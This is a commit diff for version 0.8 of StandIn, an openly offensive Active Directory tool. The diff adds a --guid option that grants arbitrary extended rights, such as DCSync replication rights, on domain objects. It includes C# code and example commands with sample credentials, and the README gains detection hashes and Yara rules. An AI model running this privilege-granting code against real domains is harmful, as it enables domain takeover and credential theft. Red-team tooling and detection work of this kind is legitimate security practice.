+v0.8

Author: FuzzySecurity

README.md

@@ -26,6 +26,8 @@ The following items are currently on the radar for implementation in subsequent
 - S4U2Pwnage (by [@harmj0y](https://twitter.com/harmj0y)) - [here](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)
 - Resource-based Constrained Delegation (by [@spotheplanet](https://twitter.com/spotheplanet)) - [here](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution)
 - Rubeus - [here](https://github.com/GhostPack/Rubeus)
+- Powerview - [here](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
+- Powermad (by [@kevin_robertson](https://twitter.com/kevin_robertson)) - [here](https://github.com/Kevin-Robertson/Powermad)
 
 # Index
 - [Help](#help)
@@ -38,7 +40,7 @@ The following items are currently on the radar for implementation in subsequent
     - [Remove ASREP from object flags](#addremove-asrep-from-object-flags)
 - [ASREP](#asrep)
 - [SPN](#spn)
-- [Unconstrained / constrained delegation](#unconstrained--constrained-delegation)
+- [Unconstrained / constrained / resource-based constrained delegation](#unconstrained--constrained--resource-based-constrained-delegation)
 - [DC's](#dcs)
 - [Groups Operations](#groups-operations)
     - [List group membership](#list-group-membership)
@@ -49,13 +51,14 @@ The following items are currently on the radar for implementation in subsequent
     - [Delete machine object](#delete-machine-object)
     - [Add msDS-AllowedToActOnBehalfOfOtherIdentity](#add-msds-allowedtoactonbehalfofotheridentity)
     - [Remove msDS-AllowedToActOnBehalfOfOtherIdentity](#remove-msds-allowedtoactonbehalfofotheridentity)
+- [Detection](#detection)
 
 ## Help
 
 ```
   __
  ( _/_   _//   ~b33f
-__)/(//)(/(/)  v0.7
+__)/(//)(/(/)  v0.8
 
 
  >--~~--> Args? <--~~--<
@@ -67,6 +70,7 @@ __)/(//)(/(/)  v0.7
 --ntaccount   User name, e.g. "REDHOOK\UPickman"
 --sid         String SID representing a target machine
 --grant       User name, e.g. "REDHOOK\KMason"
+--guid        Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
 --domain      Domain name, e.g. REDHOOK
 --user        User name
 --pass        Password
@@ -95,6 +99,7 @@ StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFl
 
 # Grant object access permissions
 StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --type DCSync
+StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
 StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOK\MBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
 
 # Set object password
@@ -363,7 +368,7 @@ C:\> StandIn.exe --object samaccountname=m-10-1909-01$ --access --ntaccount "MAI
 
 #### Syntax
 
-Add permission to the resolved object for a specified NTAccount. Currently a small set of privileges are supported (GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync) but a parameter can easily be added to allow users to specify a custom ExtendedRight GUID.
+Add permission to the resolved object for a specified NTAccount. StandIn supports a small set of pre-defined privileges (GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync) but it also allows operators to specify a custom rights guid using the `--guid` flag.
 
 ```
 C:\> whoami
@@ -1036,3 +1041,75 @@ C:\> StandIn.exe --computer m-10-1909-03 --remove
     Path     : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
 [+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed..
 ```
+
+## Detection
+
+This section will outline a number of IOC which can aid the detection engineering process for StandIn.
+
+#### Release Package Hashes
+
+The following table maps the release package hashes for StandIn.
+
+```
+-=v0.7=-
+StandIn_Net35.exe    SHA256: A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0
+                        MD5: 50D29F7597BF83D80418DEEFD360F093
+
+StandIn_Net45.exe    SHA256: DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A
+                        MD5: 4E5258A876ABCD2CA2EF80E0D5D93195
+```
+
+#### Yara
+
+The following Yara rules can be used to detect StandIn on disk, in it's default form.
+
+```js
+rule StandIn
+{
+    meta:
+        author = "Ruben Boonen (@FuzzySec)"
+        description = "Detect StandIn string constants."
+
+    strings:
+        $s1 = "StandIn" ascii wide nocase
+        $s2 = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" ascii wide nocase
+        $s3 = "msDS-AllowedToActOnBehalfOfOtherIdentity" ascii wide nocase
+        $s4 = ">--~~--> Args? <--~~--<" ascii wide nocase
+
+    condition:
+        all of ($s*)
+}
+
+rule StandIn_PDB
+{
+    meta:
+        author = "Ruben Boonen (@FuzzySec)"
+        description = "Detect StandIn default PDB."
+
+    strings:
+        $s1 = "\\Release\\StandIn.pdb" ascii wide nocase
+	
+    condition:
+        all of ($s*)
+}
+```
+
+#### SilktETW Microsoft-Windows-DotNETRuntime Yara Rule
+
+The Yara rule below can be used to detect StandIn when execution happens from memory. To use this rule, the EDR solution will require access to the `Microsoft-Windows-DotNETRuntime` ETW data provider. For testing purposes, this rule can be directly evaluated using [SilkETW](https://github.com/fireeye/SilkETW). It should be noted that this is a generic example rule, production alerting would required a more granular approach.
+
+```js
+rule Silk_StandIn_Generic
+{
+    meta:
+        author = "Ruben Boonen (@FuzzySec)"
+        description = "Generic Microsoft-Windows-DotNETRuntime detection for StandIn."
+
+    strings:
+        $s1 = "\\r\\nFullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn" ascii wide nocase
+        $s2 = "MethodFlags=Jitted;\\r\\nMethodNamespace=StandIn." ascii wide nocase
+
+    condition:
+        any of them
+}
+```

StandIn/StandIn/Program.cs

@@ -43,7 +43,7 @@ public static void returnObject(String sObject, String sDomain = "", String sUse
                     return;
                 }
 
-                // Get machine details
+                // Get object details
                 foreach (SearchResult sr in oObject)
                 {
                     DirectoryEntry mde = sr.GetDirectoryEntry();
@@ -622,7 +622,7 @@ public static void getObjectAccessPermissions(String sObject, String sNTAccount
             }
         }
 
-        public static void grantObjectAccessPermissions(String sObject, hStandIn.AccessRequest oAccess, String sNTAccount, String sDomain = "", String sUser = "", String sPass = "")
+        public static void grantObjectAccessPermissions(String sObject, hStandIn.AccessRequest oAccess, String sGUID, String sNTAccount, String sDomain = "", String sUser = "", String sPass = "")
         {
             // Create searcher
             hStandIn.SearchObject so = hStandIn.createSearchObject(sDomain, sUser, sPass);
@@ -705,9 +705,22 @@ public static void grantObjectAccessPermissions(String sObject, hStandIn.AccessR
                             ar = new ActiveDirectoryAccessRule(ir, ActiveDirectoryRights.ExtendedRight, AccessControlType.Allow, rightGuid, ActiveDirectorySecurityInheritance.None);
                             mde.Options.SecurityMasks = System.DirectoryServices.SecurityMasks.Dacl;
                             mde.ObjectSecurity.AddAccessRule(ar);
+                        } else if (!String.IsNullOrEmpty(sGUID))
+                        {
+                            Guid rightGuid = new Guid(sGUID); // Custom rights guid
+                            ActiveDirectoryAccessRule ar = new ActiveDirectoryAccessRule(ir, ActiveDirectoryRights.ExtendedRight, AccessControlType.Allow, rightGuid, ActiveDirectorySecurityInheritance.None);
+                            mde.Options.SecurityMasks = System.DirectoryServices.SecurityMasks.Dacl;
+                            mde.ObjectSecurity.AddAccessRule(ar);
                         }
+
                         mde.CommitChanges();
-                        Console.WriteLine("    |_ Success, added " + Enum.GetName(typeof(hStandIn.AccessRequest), oAccess) + " privileges to object for " + sNTAccount);
+                        if (Enum.GetName(typeof(hStandIn.AccessRequest), oAccess) != "none")
+                        {
+                            Console.WriteLine("    |_ Success, added " + Enum.GetName(typeof(hStandIn.AccessRequest), oAccess) + " privileges to object for " + sNTAccount);
+                        } else
+                        {
+                            Console.WriteLine("    |_ Success, added GUID rights privilege to object for " + sNTAccount);
+                        }
                     }
                     catch (Exception ex)
                     {
@@ -1525,6 +1538,9 @@ class ArgOptions
             [Option(null, "ntaccount")]
             public String sNtaccount { get; set; }
 
+            [Option(null, "guid")]
+            public String sGUID { get; set; }
+
             [Option(null, "delegation")]
             public Boolean bDelegation { get; set; }
 
@@ -1604,21 +1620,25 @@ static void Main(string[] args)
                             }
                             else if (!String.IsNullOrEmpty(ArgOptions.sGrant))
                             {
-                                if (!String.IsNullOrEmpty(ArgOptions.sType))
+                                if (!String.IsNullOrEmpty(ArgOptions.sType) && ArgOptions.sType.ToLower() != "none")
                                 {
                                     try
                                     {
                                         hStandIn.AccessRequest arq = (hStandIn.AccessRequest)Enum.Parse(typeof(hStandIn.AccessRequest), ArgOptions.sType.ToLower());
-                                        grantObjectAccessPermissions(ArgOptions.sObject, arq, ArgOptions.sGrant, ArgOptions.sDomain, ArgOptions.sUser, ArgOptions.sPass);
+                                        grantObjectAccessPermissions(ArgOptions.sObject, arq, ArgOptions.sGUID, ArgOptions.sGrant, ArgOptions.sDomain, ArgOptions.sUser, ArgOptions.sPass);
                                     }
                                     catch
                                     {
                                         Console.WriteLine("[!] Invalid access premission type provided..");
                                     }
                                 }
+                                else if (!String.IsNullOrEmpty(ArgOptions.sGUID))
+                                {
+                                    grantObjectAccessPermissions(ArgOptions.sObject, hStandIn.AccessRequest.none, ArgOptions.sGUID, ArgOptions.sGrant, ArgOptions.sDomain, ArgOptions.sUser, ArgOptions.sPass);
+                                }
                                 else
                                 {
-                                    grantObjectAccessPermissions(ArgOptions.sObject, hStandIn.AccessRequest.genericall, ArgOptions.sGrant, ArgOptions.sDomain, ArgOptions.sUser, ArgOptions.sPass);
+                                    grantObjectAccessPermissions(ArgOptions.sObject, hStandIn.AccessRequest.genericall, ArgOptions.sGUID, ArgOptions.sGrant, ArgOptions.sDomain, ArgOptions.sUser, ArgOptions.sPass);
                                 }
                             }
                             else if (!String.IsNullOrEmpty(ArgOptions.sNewPass))

StandIn/StandIn/hStandIn.cs

@@ -17,6 +17,7 @@ public struct SearchObject
 
         public enum AccessRequest : UInt32
         {
+            none,
             genericall,
             genericwrite,
             resetpassword,
@@ -86,7 +87,7 @@ public static void getHelp()
 		{
 			Console.WriteLine(@"  __               ");
 			Console.WriteLine(@" ( _/_   _//   ~b33f");
-			Console.WriteLine(@"__)/(//)(/(/)  v0.7");
+			Console.WriteLine(@"__)/(//)(/(/)  v0.8");
             Console.WriteLine(@"");
             string HelpText = "\n >--~~--> Args? <--~~--<\n\n" +
 							  "--help        This help menu\n" +
@@ -96,6 +97,7 @@ public static void getHelp()
                               "--ntaccount   User name, e.g. \"REDHOOK\\UPickman\"\n" +
                               "--sid         String SID representing a target machine\n" +
                               "--grant       User name, e.g. \"REDHOOK\\KMason\"\n" +
+                              "--guid        Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2\n" +
                               "--domain      Domain name, e.g. REDHOOK\n" +
 							  "--user        User name\n" +
 							  "--pass        Password\n" +
@@ -122,6 +124,7 @@ public static void getHelp()
 
                               "# Grant object access permissions\n" +
                               "StandIn.exe --object \"distinguishedname=DC=redhook,DC=local\" --grant \"REDHOOK\\MBWillett\" --type DCSync\n" +
+                              "StandIn.exe --object \"distinguishedname=DC=redhook,DC=local\" --grant \"REDHOOK\\MBWillett\" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2\n" +
                               "StandIn.exe --object samaccountname=SomeTarget001$ --grant \"REDHOOK\\MBWillett\" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e\n\n" +
 
                               "# Set object password\n" +